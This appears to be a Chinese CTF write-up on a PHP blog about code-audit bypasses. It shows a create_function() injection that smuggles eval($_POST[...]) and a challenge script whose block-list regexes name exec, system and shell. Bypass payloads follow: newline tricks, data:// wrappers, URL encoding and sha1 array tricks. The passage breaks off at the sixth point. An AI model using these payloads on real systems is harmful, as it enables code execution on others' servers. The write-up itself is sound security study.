<!DOCTYPE HTML>
<html>

<head>
	<link rel="bookmark"  type="image/x-icon"  href="/img/logo_miccall.png"/>
	<link rel="shortcut icon" href="/img/logo_miccall.png">
	
			    <title>
    ico's Blog
    </title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
    <link rel="stylesheet" href="/css/mic_main.css" />
    <link rel="stylesheet" href="/css/dropdownMenu.css" />
    <meta name="keywords" content="miccall" />
    
    	<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	 
    <noscript>
        <link rel="stylesheet" href="/css/noscript.css" />
    </noscript>
    <style type="text/css">
        body:before {
          content: ' ';
          position: fixed;
          top: 0;
          background: url('/img/bg.jpg') center 0 no-repeat;
          right: 0;
          bottom: 0;
          left: 0;
          background-size: cover; 
        }
    </style>

			    
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script async type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


    <script src="/js/jquery.min.js"></script>
    <script src="/js/jquery.scrollex.min.js"></script>
    <script src="/js/jquery.scrolly.min.js"></script>
    <script src="/js/skel.min.js"></script>
    <script src="/js/util.js"></script>
    <script src="/js/main.js"></script>
	
<meta name="generator" content="Hexo 4.2.1"></head>
    
		
<!-- Layouts -->



<!--  代码渲染  -->
<link rel="stylesheet" href="/css/prism_coy.css" />
<link rel="stylesheet" href="/css/typo.css" />
<!-- 文章页 -->
<body class="is-loading">
    <!-- Wrapper 外包 s-->
    <div id="wrapper" class="fade-in">
        <!-- Intro 头部显示 s -->
        <!-- Intro 头部显示 e -->
        <!-- Header 头部logo start -->
        <header id="header">
    <a href="/" class="logo">MICCALL</a>
</header>
        <!-- Nav 导航条 start -->
        <nav id="nav" class="special" >
            <ul class="menu links" >
			<!-- Homepage  主页  --> 
			<li >
	            <a href="/" rel="nofollow">主页</a>
	        </li>
			<!-- categories_name  分类   --> 
	        
	        <li class="active">
	            <a href="#s1">分类</a>
	                    <ul class="submenu">
	                        <li>
	                        <a class="category-link" href="/categories/buuctf/">buuctf</a></li><li><a class="category-link" href="/categories/dasctf/">dasctf</a></li><li><a class="category-link" href="/categories/knowledge/">knowledge</a></li><li><a class="category-link" href="/categories/xjpc-ctf/">xjpc-ctf</a></li><li><a class="category-link" href="/categories/%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4/">第五空间</a>
	                    </ul>
	        </li>
	        
	        <!-- archives  归档   --> 
	        
	        
		        <!-- Pages 自定义   -->
		        
		        <li>
		            <a href="/about/" title="简历">
		                简历
		            </a>
		        </li>
		        
		        <li>
		            <a href="/group/" title="团队">
		                团队
		            </a>
		        </li>
		        
		        <li>
		            <a href="/gallery/" title="图库">
		                图库
		            </a>
		        </li>
		        
		        <li>
		            <a href="/tag/" title="标签">
		                标签
		            </a>
		        </li>
		        


            </ul>
            <!-- icons 图标   -->
			<ul class="icons">
                    
                    <li>
                        <a title="github" href="https://github.com/miccall" target="_blank" rel="noopener">
                            <i class="icon fa fa-github"></i>
                        </a>
                    </li>
                    
                    <li>
                        <a title="500px" href="http://500px.com" target="_blank" rel="noopener">
                            <i class="icon fa fa-500px"></i>
                        </a>
                    </li>
                    
			</ul>
</nav>

        <div id="main" >
            <div class ="post_page_title_img" style="height: 25rem;background-image: url(http://119.45.47.193/1594651037796.jpg);background-position: center; background-repeat:no-repeat; background-size:cover;-moz-background-size:cover;overflow:hidden;" >
                <a href="#" style="padding: 4rem 4rem 2rem 4rem ;"><h2 >知识点学习</h2></a>
            </div>
            <!-- Post -->
            <div class="typo" style="padding: 3rem;">
                <h1 id="代码审计知识点学习"><a href="#代码审计知识点学习" class="headerlink" title="代码审计知识点学习"></a>代码审计知识点学习</h1><h2 id="各种bypass"><a href="#各种bypass" class="headerlink" title="各种bypass"></a>各种bypass</h2><p>学习的Y1ng大佬的文章。原文链接</p>
<p>[]: <a href="http://blog.sina.com.cn/s/blog_686999de0100jgda.html" target="_blank" rel="noopener">http://blog.sina.com.cn/s/blog_686999de0100jgda.html</a></p>
<p>[TOC]</p>
<h4 id="create-function-代码注入介绍"><a href="#create-function-代码注入介绍" class="headerlink" title="create_function()代码注入介绍"></a>create_function()代码注入介绍</h4><p><code>create_function()</code>函数有两个参数<code>$args</code>和<code>$code</code>，用于创建一个lambda样式的函数</p>
<p>例如，利用<code>create_function()</code>创建一个<code>myFunc()</code>函数，用于计算两个变量之和</p>
<pre class=" language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token variable">$myFunc</span> <span class="token operator">=</span> <span class="token function">create_function</span><span class="token punctuation">(</span><span class="token string">'$a,$b'</span><span class="token punctuation">,</span><span class="token string">'return($a+$b)'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">print_r</span><span class="token punctuation">(</span><span class="token variable">$myFunc</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span></code></pre>
<p>实际上，<code>myFunc()</code>就相当于：</p>
<pre class=" language-php"><code class="language-php"><span class="token keyword">function</span> <span class="token function">myFunc</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">,</span> <span class="token variable">$b</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token keyword">return</span> <span class="token variable">$a</span><span class="token operator">+</span><span class="token variable">$b</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span></code></pre>
<p>这看似正常，实则充满危险。由于<code>$code</code>可控，底层又没有响应的保护参数，就导致出现了代码注入。见如下例子：</p>
<pre class=" language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token variable">$myFunc</span> <span class="token operator">=</span> <span class="token function">create_function</span><span class="token punctuation">(</span><span class="token string">'$a, $b'</span><span class="token punctuation">,</span> <span class="token string">'return($a+$b);}eval($_POST['</span>Y1ng<span class="token string">']);\\'</span><span class="token punctuation">)</span><span class="token punctuation">;</span></code></pre>
<p>执行时的<code>myFunc()</code>为：</p>
<pre class=" language-php"><code class="language-php"><span class="token keyword">function</span> <span class="token function">myFunc</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">,</span> <span class="token variable">$b</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token keyword">return</span> <span class="token variable">$a</span><span class="token operator">+</span><span class="token variable">$b</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token function">eval</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string">'Y1ng'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment" spellcheck="true">//}</span></code></pre>
<p>通过手工闭合<code>}</code>使后面的代码<code>eval()</code>逃逸出了<code>myFunc()</code>得以执行，然后利用注释符<code>//</code>注释掉<code>}</code>保证了语法正确。</p>
<h4 id="一道ctf"><a href="#一道ctf" class="headerlink" title="一道ctf"></a>一道ctf</h4><p>通过代码审计来学习一下各种bypass：</p>
<pre class=" language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">error_reporting</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 

<span class="token variable">$file</span> <span class="token operator">=</span> <span class="token string">"1nD3x.php"</span><span class="token punctuation">;</span>
<span class="token variable">$y1ng</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'y1ng'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$passwd</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'passwd'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$arg</span> <span class="token operator">=</span> <span class="token string">''</span><span class="token punctuation">;</span>
<span class="token variable">$code</span> <span class="token operator">=</span> <span class="token string">''</span><span class="token punctuation">;</span>

<span class="token keyword">echo</span> <span class="token string">"&lt;font color=red>&lt;B>Notice1: If you get my flag, you will get a BIG GIFT!&lt;/B>&lt;br>&lt;/font>"</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> "<span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>font</span> <span class="token attr-name">color</span><span class="token attr-value"><span class="token punctuation">=</span>red</span><span class="token punctuation">></span></span></span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>B</span><span class="token punctuation">></span></span></span>Notice2<span class="token punctuation">:</span> Dangerous functions<span class="token punctuation">,</span> such <span class="token keyword">as</span> <span class="token function">shell_exec</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token function">system</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword">and</span> so
on<span class="token punctuation">,</span> are disabled in php<span class="token punctuation">.</span>ini<span class="token punctuation">.</span> Chopper<span class="token operator">&amp;</span>AntSword are also useless<span class="token operator">!</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>B</span><span class="token punctuation">></span></span></span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span><span class="token punctuation">></span></span></span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>font</span><span class="token punctuation">></span></span></span>"<span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token string">"&lt;font color=red>&lt;B>Notice3: flag is Y1ng{xxxxxxxx}!&lt;/B>&lt;br>&lt;br>&lt;/font>"</span><span class="token punctuation">;</span>

<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> 
    <span class="token keyword">if</span> <span class="token punctuation">(</span>
        <span class="token function">preg_match</span><span class="token punctuation">(</span>'<span class="token operator">/</span>y1ng<span class="token operator">|</span>zuishuai<span class="token operator">|</span>flag<span class="token operator">|</span>YuZhou<span class="token operator">|</span>Wudi<span class="token operator">|</span>system<span class="token operator">|</span>exec<span class="token operator">|</span>passwd<span class="token operator">|</span>ass<span class="token operator">|</span>eval<span class="token operator">|</span>sort<span class="token operator">|</span>shell<span class="token operator">|</span>ob<span class="token operator">|</span>start
    <span class="token operator">|</span>mail<span class="token operator">|</span>\$<span class="token operator">|</span>sou<span class="token operator">|</span>show<span class="token operator">|</span>cont<span class="token operator">|</span>high<span class="token operator">|</span>reverse<span class="token operator">|</span>flip<span class="token operator">|</span>rand<span class="token operator">|</span>scan<span class="token operator">|</span>chr<span class="token operator">|</span>local<span class="token operator">|</span>sess<span class="token operator">|</span>id<span class="token operator">|</span>source<span class="token operator">|</span>arra<span class="token operator">|</span>head<span class="token operator">|</span>light<span class="token operator">|</span>read<span class="token operator">|</span>inc<span class="token operator">|</span>info<span class="token operator">|</span>bin<span class="token operator">|</span>hex<span class="token operator">|</span>oct<span class="token operator">|</span><span class="token keyword">echo</span><span class="token operator">|</span><span class="token keyword">print</span><span class="token operator">|</span>pi<span class="token operator">|</span>\<span class="token punctuation">.</span><span class="token operator">|</span>\"<span class="token operator">|</span>\<span class="token string">'|log/i'</span><span class="token punctuation">,</span> <span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string">'QUERY_STRING'</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
        <span class="token punctuation">)</span>  
        <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">'fxck your key words!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token punctuation">}</span>

<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">'/http/i'</span><span class="token punctuation">,</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">'/^y1ngzuishuai$/'</span><span class="token punctuation">,</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'zuishuai'</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'zuishuai'</span><span class="token punctuation">]</span> <span class="token operator">!==</span> <span class="token string">'y1ngzuishuai'</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> 
        <span class="token variable">$file</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">"file"</span><span class="token punctuation">]</span><span class="token punctuation">;</span> 
        <span class="token keyword">echo</span> <span class="token string">"Yes! You know that I zuishuai!&lt;br>"</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> 
<span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">'fxck you! no RFI!!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$_REQUEST</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> 
    <span class="token keyword">foreach</span><span class="token punctuation">(</span><span class="token variable">$_REQUEST</span> <span class="token keyword">as</span> <span class="token variable">$value</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> 
        <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">'/[a-zA-Z]/i'</span><span class="token punctuation">,</span> <span class="token variable">$value</span><span class="token punctuation">)</span><span class="token punctuation">)</span>  
            <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">'fxck your English letters'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token punctuation">}</span> 
<span class="token punctuation">}</span> 

<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span> <span class="token operator">!==</span> <span class="token string">'y1ng_YuZhou_Wudi_zuishuai'</span><span class="token punctuation">)</span>
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">' Am not I universe wudi zuishuai?&lt;br>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>


<span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token function">sha1</span><span class="token punctuation">(</span><span class="token variable">$y1ng</span><span class="token punctuation">)</span> <span class="token operator">===</span> <span class="token function">sha1</span><span class="token punctuation">(</span><span class="token variable">$passwd</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token variable">$y1ng</span> <span class="token operator">!=</span> <span class="token variable">$passwd</span> <span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token function">extract</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">"flag"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">echo</span> <span class="token string">"Very good! you know my password. But what is flag?&lt;br>"</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> <span class="token keyword">else</span><span class="token punctuation">{</span>
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">'fxck you! you dont know password! you dont know sha1! why you come here!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">'/^[a-z0-9]*$/isD'</span><span class="token punctuation">,</span> <span class="token variable">$code</span><span class="token punctuation">)</span> <span class="token operator">||</span> 
<span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">'/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&amp;|\$|\*|\||\&lt;|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log/i'</span><span class="token punctuation">,</span> <span class="token variable">$arg</span><span class="token punctuation">)</span>  <span class="token punctuation">)</span> <span class="token punctuation">{</span> 
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">'fxck you! Read my Regular Express1on!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span> 
    <span class="token keyword">include</span> <span class="token string">"flag.php"</span><span class="token punctuation">;</span>
    <span class="token variable">$code</span><span class="token punctuation">(</span><span class="token string">''</span><span class="token punctuation">,</span> <span class="token variable">$arg</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token punctuation">}</span> <span class="token delimiter">?></span></code></pre>
<h5 id="考点1：绕过QUERY-STRING的正则匹配"><a href="#考点1：绕过QUERY-STRING的正则匹配" class="headerlink" title="考点1：绕过QUERY_STRING的正则匹配"></a>考点1：绕过QUERY_STRING的正则匹配</h5><pre class=" language-php"><code class="language-php"><span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> 
    <span class="token keyword">if</span> <span class="token punctuation">(</span>
        <span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">'/y1ng|zuishuai|flag|YuZhou|Wudi|system|exec|passwd|ass|eval|sort|shell|ob|star t|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|lig ht|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i'</span><span class="token punctuation">,</span> <span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string">'QUERY_STRING'</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
        <span class="token punctuation">)</span>  
        <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">'fxck your key words!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token punctuation">}</span></code></pre>
<p>这个正则匹配了许多关键字，比如y1ng zuishuai flag passwd这些都是必须要用的，所以需要bypass。</p>
<p>首先了解一下QUERY_STRING：</p>
<blockquote>
<pre><code>原文链接 http://blog.sina.com.cn/s/blog_686999de0100jgda.html

1，http://localhost/aaa/ (打开aaa中的index.php)
结果：
$_SERVER[&#39;QUERY_STRING&#39;] = &quot;&quot;;
$_SERVER[&#39;REQUEST_URI&#39;] = &quot;/aaa/&quot;;
$_SERVER[&#39;SCRIPT_NAME&#39;] = &quot;/aaa/index.php&quot;;
$_SERVER[&#39;PHP_SELF&#39;] = &quot;/aaa/index.php&quot;;

2，http://localhost/aaa/?p=222 (附带查询)
结果：
$_SERVER[&#39;QUERY_STRING&#39;] = &quot;p=222&quot;;
$_SERVER[&#39;REQUEST_URI&#39;] = &quot;/aaa/?p=222&quot;;
$_SERVER[&#39;SCRIPT_NAME&#39;] = &quot;/aaa/index.php&quot;;
$_SERVER[&#39;PHP_SELF&#39;] = &quot;/aaa/index.php&quot;;

3，http://localhost/aaa/index.php?p=222&amp;q=333
结果：
$_SERVER[&#39;QUERY_STRING&#39;] = &quot;p=222&amp;q=333&quot;;
$_SERVER[&#39;REQUEST_URI&#39;] = &quot;/aaa/index.php?p=222&amp;q=333&quot;;
$_SERVER[&#39;SCRIPT_NAME&#39;] = &quot;/aaa/index.php&quot;;
$_SERVER[&#39;PHP_SELF&#39;] = &quot;/aaa/index.php&quot;;

由实例可知：
$_SERVER[&quot;QUERY_STRING&quot;] 获取查询 语句，实例中可知，获取的是?后面的值
$_SERVER[&quot;REQUEST_URI&quot;] 获取 http://localhost 后面的值，包括/
$_SERVER[&quot;SCRIPT_NAME&quot;] 获取当前脚本的路径，如：index.php
$_SERVER[&quot;PHP_SELF&quot;] 当前正在执行脚本的文件名</code></pre></blockquote>
<p>由于<code>$_SERVER[&#39;QUERY_STRING&#39;]</code>不会进行URLDecode，而<code>$_GET[]</code>会，所以只要进行url编码即可绕过：</p>
<h5 id="考点2：绕过y1ngzuishuai的正则匹配"><a href="#考点2：绕过y1ngzuishuai的正则匹配" class="headerlink" title="考点2：绕过y1ngzuishuai的正则匹配"></a>考点2：绕过y1ngzuishuai的正则匹配</h5><pre class=" language-php"><code class="language-php"><span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">'/^y1ngzuishuai$/'</span><span class="token punctuation">,</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'zuishuai'</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'zuishuai'</span><span class="token punctuation">]</span> <span class="token operator">!==</span> <span class="token string">'y1ngzuishuai'</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> 
        <span class="token variable">$file</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">"file"</span><span class="token punctuation">]</span><span class="token punctuation">;</span> 
        <span class="token keyword">echo</span> <span class="token string">"Yes! You know that I zuishuai!&lt;br>"</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> </code></pre>
<p>看这段代码（先不管他外面那个禁止RFI的if条件），<code>/^y1ngzuishuai$/</code>中<code>^</code>匹配起始、<code>$</code>匹配结束，但又不能是y1ngzuishuai。</p>
<p>对于这种正则匹配，可以使用<code>%0a</code>换行污染绕过，payload:</p>
<pre><code>?zuishuai=y1ngzuishuai%0a</code></pre><h5 id="考点3：绕过-REQUEST的字母匹配"><a href="#考点3：绕过-REQUEST的字母匹配" class="headerlink" title="考点3：绕过$_REQUEST的字母匹配"></a>考点3：绕过$_REQUEST的字母匹配</h5><pre class=" language-php"><code class="language-php"><span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$_REQUEST</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> 
    <span class="token keyword">foreach</span><span class="token punctuation">(</span><span class="token variable">$_REQUEST</span> <span class="token keyword">as</span> <span class="token variable">$value</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> 
        <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">'/[a-zA-Z]/i'</span><span class="token punctuation">,</span> <span class="token variable">$value</span><span class="token punctuation">)</span><span class="token punctuation">)</span>  
            <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">'fxck your English letters'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token punctuation">}</span> 
<span class="token punctuation">}</span></code></pre>
<p><code>foreach</code>循环遍历<code>$_REQUEST</code>数组，将键值赋给<code>$value</code>，然后检测<code>$value</code>是否包含字母，若是 则<code>die()</code>。</p>
<p>根据题目可知，我们必须要<code>$_GET[]</code>一些东西，比如考点2中的<code>y1ngzuishuai%0a</code>。我们知道<code>$_REQUEST</code>同时接受GET和POST的数据，并且POST具有更高的优先值。</p>
<p>因此对于需要GET的一些参数，比如<code>zuishuai</code>，只需要同时POST一个数字即可绕过：</p>
<h5 id="考点4：绕过文件内容读取的比较"><a href="#考点4：绕过文件内容读取的比较" class="headerlink" title="考点4：绕过文件内容读取的比较"></a>考点4：绕过文件内容读取的比较</h5><pre class=" language-php"><code class="language-php"><span class="token variable">$file</span> <span class="token operator">=</span> <span class="token string">"1nD3x.php"</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">'/http/i'</span><span class="token punctuation">,</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">'/^y1ngzuishuai$/'</span><span class="token punctuation">,</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'zuishuai'</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'zuishuai'</span><span class="token punctuation">]</span> <span class="token operator">!==</span> <span class="token string">'y1ngzuishuai'</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> 
                <span class="token variable">$file</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">"file"</span><span class="token punctuation">]</span><span class="token punctuation">;</span> 
        <span class="token keyword">echo</span> <span class="token string">"Yes! You know that I zuishuai!&lt;br>"</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> 
<span class="token punctuation">}</span> <span class="token keyword">else</span> 
        <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">'fxck you! no RFI!!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span> <span class="token operator">!==</span> <span class="token string">'y1ng_YuZhou_Wudi_zuishuai'</span><span class="token punctuation">)</span>
        <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">' Am not I universe wudi zuishuai?&lt;br>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span></code></pre>
<p>只要绕过y1ngzuishuai后，<code>$file</code>变量就可控了，但是没有任何一个本地文件的内容是y1ng_YuZhou….，正则匹配了http又无法远程文件包含。所以需要构造出一个<code>$file</code>，使<code>file_get_contents()</code>返回题目要的字符串。</p>
<p><code>data://</code>伪协议使用方法如下：</p>
<pre><code>data://text/plain,&lt;?php phpinfo()?&gt;
data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=</code></pre><p>但是本题目只<code>file_get_contents()</code>来做比较判断并不包含，因此无法通过<code>data://</code>进行RCE，却可以用来绕过比较。payload：</p>
<pre><code>file=data:text/plain,y1ng_YuZhou_Wudi_zuishuai</code></pre><p>结合其他代码</p>
<ol>
<li>post提交file=1绕过<code>$_REQUEST</code></li>
<li>y1ng是被ban掉的关键字，因此可以将<code>y1ng_YuZhou_Wudi_zuishuai</code>进行url编码后，都可以绕过。</li>
</ol>
<p>所以最终payload为：</p>
<pre><code>file=data://text/plain,%79%31%6e%67%5f%59%75%5a%68%6f%75%5f%57%75%64%69%5f%7a%75%69%73%68%75%61%69</code></pre><p>或者如果加上base64的话，因为<code>y1ng_YuZhou_Wudi_zuishuai</code>这个字符串进行base64编码后包含<code>ob</code>，而<code>ob</code>被正则给<code>ban</code>了，因此用base64也要url编码，payload：</p>
<pre><code>file=data://text/plain;base64,%65%54%46%75%5a%31%39%5a%64%56%70%6f%62%33%56%66%56%33%56%6b%61%56%39%36%64%57%6c%7a%61%48%56%68%61%51==</code></pre><h5 id="考点5，绕过sha1比较"><a href="#考点5，绕过sha1比较" class="headerlink" title="考点5，绕过sha1比较"></a>考点5，绕过sha1比较</h5><p>题目要求<code>$y1ng</code>和<code>$passwd</code>不相等，但是他们的<code>sha1</code>要相等，如何绕过？</p>
<p><code>sha1()</code>函数是无法处理数组的，如果<code>sha1()</code>的参数为一个数组会报Warning并返回False。</p>
<p>所以只要<code>$y1ng</code>和<code>$password</code>都是数组，那么就会双双返回false，相等。</p>
<p>数组绕过。</p>
<p><strong>总结</strong>一下上面5个小考点的payload</p>
<pre><code>?zuishuai=y1ngzuishuai%0a&amp;y1ng[]=1&amp;passwd[]=2&amp;file=data://text/plain,y1ng_YuZhou_Wudi_zuishuai</code></pre><p>编码后为</p>
<pre><code>?%7a%75%69%73%68%75%61%69=%79%31%6e%67%7a%75%69%73%68%75%61%69%25%30%61&amp;%79%31%6e%67%5b%5d=%31&amp;%70%61%73%73%77%64%5b%5d=%32&amp;%66%69%6c%65=%64%61%74%61://%74%65%78%74/%70%6c%61%69%6e%2c%79%31%6e%67%5f%59%75%5a%68%6f%75%5f%57%75%64%69%5f%7a%75%69%73%68%75%61%69</code></pre><p>别忘了Post:</p>
<pre><code>zuishuai=1&amp;file=1</code></pre><h5 id="考点6，create-function-代码注入"><a href="#考点6，create-function-代码注入" class="headerlink" title="考点6，create_function()代码注入"></a>考点6，create_function()代码注入</h5><pre class=" language-php"><code class="language-php"><span class="token variable">$arg</span> <span class="token operator">=</span> <span class="token string">''</span><span class="token punctuation">;</span>
<span class="token variable">$code</span> <span class="token operator">=</span> <span class="token string">''</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token function">sha1</span><span class="token punctuation">(</span><span class="token variable">$y1ng</span><span class="token punctuation">)</span> <span class="token operator">===</span> <span class="token function">sha1</span><span class="token punctuation">(</span><span class="token variable">$passwd</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token variable">$y1ng</span> <span class="token operator">!=</span> <span class="token variable">$passwd</span> <span class="token punctuation">)</span><span class="token punctuation">{</span>
